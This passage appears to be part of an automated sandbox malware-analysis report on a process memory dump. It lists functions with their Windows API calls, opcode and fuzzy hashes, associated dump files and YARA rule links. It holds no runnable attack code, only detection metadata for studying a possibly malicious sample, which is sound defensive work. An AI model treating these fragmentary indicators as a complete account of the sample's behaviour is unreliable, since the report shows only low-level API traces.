WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,008843ED,?,00000000,?,?), ref: 0083FE4E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0083FE77

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_wcslen
String ID:
API String ID: 2761822629-0
Opcode ID: d11c2d161d0b588bf7594a01b34997b6fac184771226e7e62d339b31bc4eda06
Instruction ID: 0320458188ba5eb56383784131ce7eabe13e12e523f195678d946174e53ef186
Opcode Fuzzy Hash: d11c2d161d0b588bf7594a01b34997b6fac184771226e7e62d339b31bc4eda06
Instruction Fuzzy Hash: CC018672B4121876E63059AD5C06F67B75CEBC6F61F200375FF18EA1E1E5A1AC0041E5

Uniqueness

Uniqueness Score: -1.00%

Function 00839769, Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 008397A6
DispatchMessageW.USER32 ref: 008397B1
PeekMessageW.USER32 ref: 008397C4

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: bd4d351680e3c1a553af622cc4c273c2aae8ea45b5841ed4f228aa22b4efe092
Instruction ID: 46b69231d4f8ee65c842f2cee5f70ae6af63e5db535a6b30ace867fc84c61cb9
Opcode Fuzzy Hash: bd4d351680e3c1a553af622cc4c273c2aae8ea45b5841ed4f228aa22b4efe092
Instruction Fuzzy Hash: A8F0DA311543019AD624DFA49D45BAA77A8FBD4784F400918F785C66E0EBB0D448CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0083F180, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON

Download Yara Rule

APIs

Part of subcall function 0083F490: _strcat.LIBCMT ref: 0083F4B6

_free.LIBCMT ref: 00859524

Part of subcall function 008335F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00833681
Part of subcall function 008335F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00833697
Part of subcall function 008335F0: __wsplitpath.LIBCMT ref: 008336C2
Part of subcall function 008335F0: _wcscpy.LIBCMT ref: 008336D7
Part of subcall function 008335F0: _wcscat.LIBCMT ref: 008336EC
Part of subcall function 008335F0: SetCurrentDirectoryW.KERNELBASE(?), ref: 008336FC

Strings

C:\Users\user\33920049\fmkkelc.omp, xrefs: 0083F188, 0083F18B, 0083F1B5, 0083F1B7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
String ID: C:\Users\user\33920049\fmkkelc.omp
API String ID: 3938964917-3362734216
Opcode ID: 9357f94b5c2586e31d50fd982477acabed5f73a17ceb337a7b30ce2269232e8b
Instruction ID: eabf370ae1e0b41e6eaf563f1f4ba9160c1402cb2583c90823f1c2a7101c7b40
Opcode Fuzzy Hash: 9357f94b5c2586e31d50fd982477acabed5f73a17ceb337a7b30ce2269232e8b
Instruction Fuzzy Hash: 5A916F71900219DBCF14EFA8C8819EE77B9FF48310F108529E955EB352D775EA0ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0083F1D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 0085959F

Part of subcall function 0083F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,0083F1F5,C:\Users\user\33920049\fmkkelc.omp,008D90E8,C:\Users\user\33920049\fmkkelc.omp,?,0083F1F5,?,?,00000001), ref: 0083F23C

Part of subcall function 0083F3B0: SHGetMalloc.SHELL32(0083F1FC), ref: 0083F3BD
Part of subcall function 0083F3B0: SHGetDesktopFolder.SHELL32(?,008D90E8), ref: 0083F3D2
Part of subcall function 0083F3B0: _wcsncpy.LIBCMT ref: 0083F3ED
Part of subcall function 0083F3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 0083F427
Part of subcall function 0083F3B0: _wcsncpy.LIBCMT ref: 0083F440

Part of subcall function 0083F290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 0083F2AB

Strings

X, xrefs: 00859564

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
String ID: X
API String ID: 85490731-3081909835
Opcode ID: 4a4d8844804246e94ced190192e51a9b89d5c211134666c8fc9fb102f8219c8c
Instruction ID: 2dfd6646e7f7eb4d87b80fafa0b8e625b64d774b6a5709001607b9928333a226
Opcode Fuzzy Hash: 4a4d8844804246e94ced190192e51a9b89d5c211134666c8fc9fb102f8219c8c
Instruction Fuzzy Hash: 5B115EB4E002489ADB019BD9D8457EEBBB9FF95304F048019E614EB292DBB4184A8BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00832AB0, Relevance: 3.5, APIs: 2, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: 8181a60b18a3979ce134c8bc2c4257a6c23d38b848732dc27c9040a69f097b66
Instruction ID: 502e0aeeca3f580e346066e60f4ff18367b0a7e3bced42a54d0177cee2ba8ccd
Opcode Fuzzy Hash: 8181a60b18a3979ce134c8bc2c4257a6c23d38b848732dc27c9040a69f097b66
Instruction Fuzzy Hash: 73F18C7590420D9BCF14EF58C8829AEB375FF84310F618566E805EB251D735EE86CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0083B1F0, Relevance: 3.3, APIs: 2, Instructions: 258COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0085D1B8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f7a78a404bc7cbcf7c4c468ddc1f833d9d412ef0b4c95ea74482aaaad5828941
Instruction ID: 02eae2f215aa6b24d7327ce3d44d815d2e45bac8f3294e87369e3dff383696b2
Opcode Fuzzy Hash: f7a78a404bc7cbcf7c4c468ddc1f833d9d412ef0b4c95ea74482aaaad5828941
Instruction Fuzzy Hash: 44915CB0A00218CBDB24EF68C885AAAB7E5FF89304F24C569ED15DB355D731EC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0083C440, Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
Instruction ID: eba1249e56828dc5ba27f7e4ab5adbedddf386d405ac86d3966e397ec1b407d8
Opcode Fuzzy Hash: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
Instruction Fuzzy Hash: 9A51A071A00205ABDB24EF68C895EBAB7B8FF84300F148459F959DB242E774ED84C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00896C11, Relevance: 3.1, APIs: 2, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00896CCB
_memmove.LIBCMT ref: 00896CF6

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 1d3d559bb8e9b09fb062c8b4a646ea8d71e306a54740bdc3581e7da8724b51b1
Instruction ID: 40aa689879dd453d94bc30e5e9adcc614b919aee3d9dba334b7147cdbc6d15e8
Opcode Fuzzy Hash: 1d3d559bb8e9b09fb062c8b4a646ea8d71e306a54740bdc3581e7da8724b51b1
Instruction Fuzzy Hash: 8A41F4B1D00144AFCF10BF58C885BAA7B75FF85304F188058F949DB342EA35E956CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0083BFD0, Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0083C01D
_memmove.LIBCMT ref: 0083C09C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 446f979d8975dc5b14e80a7db2099598e0c625c053a64bc68ff4ac78c3afc0df
Instruction ID: d43fbe6ae36d8366bac231fb0878633ebf5a72a79f23580b7285310bf6a641a2
Opcode Fuzzy Hash: 446f979d8975dc5b14e80a7db2099598e0c625c053a64bc68ff4ac78c3afc0df
Instruction Fuzzy Hash: 7231A0B16006059FC724DF6DC891A67B3E9FF84314B24862EE89AC7751EB71E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0083D8B0, Relevance: 3.1, APIs: 2, Instructions: 74COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0083D979
FreeLibrary.KERNEL32(?), ref: 0083D98E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeInfoLibraryParametersSystem
String ID:
API String ID: 3403648963-0
Opcode ID: 08f0cd4b631007618605e4184b9f8fb11388a4259cb0ae564ae3c95ce3240e7b
Instruction ID: a9089dd40d79d60935d346a89a8b5ac843b38ff914fd13d935829a5a94c8e102
Opcode Fuzzy Hash: 08f0cd4b631007618605e4184b9f8fb11388a4259cb0ae564ae3c95ce3240e7b
Instruction Fuzzy Hash: 322139B19083059BC300EF19EC8591ABBE4FBC8314F404A2EF888E7262D775D9458FD2

Uniqueness

Uniqueness Score: -1.00%

Function 00833C80, Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00833CB3
_wcscpy.LIBCMT ref: 00833CD3

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc_wcscpy_wcslen
String ID:
API String ID: 245337311-0
Opcode ID: 102fefb9d9849964aefb8f3e9d1675938a27bddc5573688d510907abfdfe27b6
Instruction ID: c4b4e3b4e7d523716196f323c0dd2952e431007af5a02b3f3d06f680c2fc6385
Opcode Fuzzy Hash: 102fefb9d9849964aefb8f3e9d1675938a27bddc5573688d510907abfdfe27b6
Instruction Fuzzy Hash: 081155B0600A449FD724DF69C446E26F7E4FF85315F04C82EE89A8BB91D675E881CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0088E400, Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 0083F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,0083F1F5,C:\Users\user\33920049\fmkkelc.omp,008D90E8,C:\Users\user\33920049\fmkkelc.omp,?,0083F1F5,?,?,00000001), ref: 0083F23C

WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,?), ref: 0088E454
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0088E467

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringWrite$FullNamePath
String ID:
API String ID: 3876400906-0
Opcode ID: 7a2050ad7ae0fadd84fa9473fb0bae384299b03bb0b7190101b8d90ee2231c33
Instruction ID: 9af729aeffb68004f80635ebfe0eabedabaaa3e18c322a9ae0cd11f86147d16d
Opcode Fuzzy Hash: 7a2050ad7ae0fadd84fa9473fb0bae384299b03bb0b7190101b8d90ee2231c33
Instruction Fuzzy Hash: A3014471A103146BD720FB69EC45F6AB7ECEB44710F10869AFC54E7251DA74BD018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 008407A0, Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0083E094,?,00000001,?,00833653,?), ref: 008407CA
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0083E094,?,00000001,?,00833653,?), ref: 00856296

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3cb9b149f24344239fb41de5ce384d50e30dd177568e3ce4381bb95435b3ce14
Instruction ID: f4391f3776446b17c5b9c2c6475e28ca4e3a45f6629b0797ed611ef8e29169f4
Opcode Fuzzy Hash: 3cb9b149f24344239fb41de5ce384d50e30dd177568e3ce4381bb95435b3ce14
Instruction Fuzzy Hash: 0F013C30384708BAF2351A289C4BF923694FF45B25F244714BBE5FF1E1D6F578868A45

Uniqueness

Uniqueness Score: -1.00%

Function 008316A0, Relevance: 3.0, APIs: 2, Instructions: 50COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 008316E5

Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3

_wcscat.LIBCMT ref: 00858BC8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: FullNamePath_memmove_wcscat_wcslen
String ID:
API String ID: 189345764-0
Opcode ID: 7f1d7e66084e4f4dbecdcffbab60b611b50055e19e305d60c89cabf28862cedb
Instruction ID: f4c917c7046fb5fb8ba7152d52753484f5fe155564a79ba1a010378700c32067
Opcode Fuzzy Hash: 7f1d7e66084e4f4dbecdcffbab60b611b50055e19e305d60c89cabf28862cedb
Instruction Fuzzy Hash: F801847454020CDBCF10EBA4CC86ADEB3B8FF65311F004696A905D7351FE349A888BE2

Uniqueness

Uniqueness Score: -1.00%

Function 00844966, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00847E9A: __getptd_noexit.LIBCMT ref: 00847E9A

__lock_file.LIBCMT ref: 008449AD

Part of subcall function 00845391: __lock.LIBCMT ref: 008453B6

__fclose_nolock.LIBCMT ref: 008449B8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 63ae32e5be8736cb527d4d328221cdd5cb68b83b2106cde13f59e804ed797ea5
Instruction ID: 5fb6bf0555325a357fb61b96f66c95d627d741da2770dfd6f42d25c8d857df18
Opcode Fuzzy Hash: 63ae32e5be8736cb527d4d328221cdd5cb68b83b2106cde13f59e804ed797ea5
Instruction Fuzzy Hash: 44F0367180171D9AD720AB7C880275F7FA0FF01338F109758A475EA1E2DB785902AB57

Uniqueness

Uniqueness Score: -1.00%

Function 0083D5C0, Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0083D5DC

Part of subcall function 00839430: PeekMessageW.USER32 ref: 008394B6

Sleep.KERNEL32(00000000), ref: 0085E125

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePeekSleepTimetime
String ID:
API String ID: 1792118007-0
Opcode ID: 27e4458e24bbcaaaa83832a8c824713845c751a9609d088a0a000c53a663a549
Instruction ID: b65438703de497a3dd6f611a6e15aea32d497362a6cfa550123f87ff1390e50a
Opcode Fuzzy Hash: 27e4458e24bbcaaaa83832a8c824713845c751a9609d088a0a000c53a663a549
Instruction Fuzzy Hash: 19F058312406029FC314AB69D849B66BBE8FB95351F004139E86AC7251EB70B800CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 0083F260, Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0083F262

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

_wcscpy.LIBCMT ref: 0083F282

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc_wcscpy_wcslen
String ID:
API String ID: 245337311-0
Opcode ID: 1d2eb1764ce3a83f1aaf0d203f56565941bd43cb088e3454f3a9985f078486d0
Instruction ID: 5186833a98c5705d4a9a70668fa2470e37b8180592d9a7f9c72c14efe2b91041
Opcode Fuzzy Hash: 1d2eb1764ce3a83f1aaf0d203f56565941bd43cb088e3454f3a9985f078486d0
Instruction Fuzzy Hash: F2D012126120A4269A59717D1C1FDBF444DDF83795F04416DB506C6686DD194C8253E6

Uniqueness

Uniqueness Score: -1.00%

Function 00833D20, Relevance: 2.6, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0083378C,?,?,?,00000010), ref: 00833D38

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00833D71

Part of subcall function 00833DA0: _memmove.LIBCMT ref: 00833DD7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_malloc_memmove
String ID:
API String ID: 961785871-0
Opcode ID: b74f7cedfcc8b0d469e80b5c57bde337cf3dd27065e0d0502b79067a38bf4a5b
Instruction ID: 18c953120e1313f945d702ffe88ad5a273dc7e88a411becf88b44031dd0b35ed
Opcode Fuzzy Hash: b74f7cedfcc8b0d469e80b5c57bde337cf3dd27065e0d0502b79067a38bf4a5b
Instruction Fuzzy Hash: E601D1723542047FE710AB68EC86F6B779CFBC4B11F004025FA09DF2C1D9A1ED0082A2

Uniqueness

Uniqueness Score: -1.00%

Function 0089F94D, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

_memmove.LIBCMT ref: 0089FAAB

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
